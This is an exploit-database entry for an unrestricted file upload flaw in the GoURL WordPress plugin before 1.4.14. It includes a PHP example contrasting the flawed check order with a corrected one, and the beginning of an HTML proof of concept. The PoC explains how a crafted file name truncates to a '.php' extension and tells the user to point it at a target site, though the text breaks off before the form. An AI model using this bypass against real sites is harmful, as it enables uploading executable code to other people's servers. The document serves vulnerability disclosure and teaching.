Exploits / Vulnerability Discovered: 2018-10-31
Type: webapps
Platform: php
This exploit / vulnerability (WordPress plugin gourl.io < 1.4.14 file upload) is for educational purposes only; if you use it, you do so at your own risk!
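The PoC comment further down gives the root cause: the extension is checked first, and the file name is then cut to its first 95 characters. A simplified model of that check order beside a corrected one follows, as an added example (not the GoURL plugin's code and not part of the original PoC); the function names and the allow-list are assumptions.

```php
<?php
// Added illustration: a simplified model of the check order described in the
// PoC comment, not the GoURL plugin's code. Function names and the allow-list
// are assumptions made for this example.

const MAX_NAME_LEN = 95;   // length limit named in the PoC comment
const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif', 'zip', 'pdf']; // assumed

function ext_of(string $name): string {
    return strtolower(pathinfo($name, PATHINFO_EXTENSION));
}

// Flawed order: validate the extension, then truncate the validated name.
function store_name_flawed(string $name): ?string {
    if (!in_array(ext_of($name), ALLOWED_EXT, true)) {
        return null;                          // rejected
    }
    return substr($name, 0, MAX_NAME_LEN);    // can cut off the checked extension
}

// Corrected order: shorten only the base name, re-attach the extension,
// then validate the exact string that will be written to disk.
function store_name_fixed(string $name): ?string {
    $name = basename($name);
    $ext  = ext_of($name);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Replace everything outside a conservative set, dots included, so no
    // inner ".php" segment survives in the stored name.
    $base = preg_replace('/[^A-Za-z0-9_-]+/', '_', pathinfo($name, PATHINFO_FILENAME));
    $base = substr($base, 0, MAX_NAME_LEN - strlen($ext) - 1);
    if ($base === '') {
        return null;                          // nothing left to name the file
    }
    $final = $base . '.' . $ext;
    $ok = (ext_of($final) === $ext) && (strlen($final) <= MAX_NAME_LEN);
    return $ok ? $final : null;
}

// Constructed input: the file name given in the PoC comment.
$name = '123456789a123456789b123456789c123456789d123456789e123456789f'
      . '123456789g123456789h123456789i1.php.jpg';

printf("flawed: %s\n", store_name_flawed($name));
printf("fixed:  %s\n", store_name_fixed($name));
```

For the PoC's file name the flawed function returns a stored name ending in `.php`, while the corrected one returns a 95-character name ending in `.jpg`.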
[+] Code ...
<html>
<!--
GoURL Unrestricted Upload Vulnerability POC by @pouyadarabi
CWE-434
After checking the file extension, substring was used on the file name to select the first 95 letters (line #5655)
So entering a file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
will upload a file with a .php extension to the website :)
-->
<body>
<!--
Replace http://127.0.0.1/wp/ with target wordpress website
Fill id param in form action to any active download product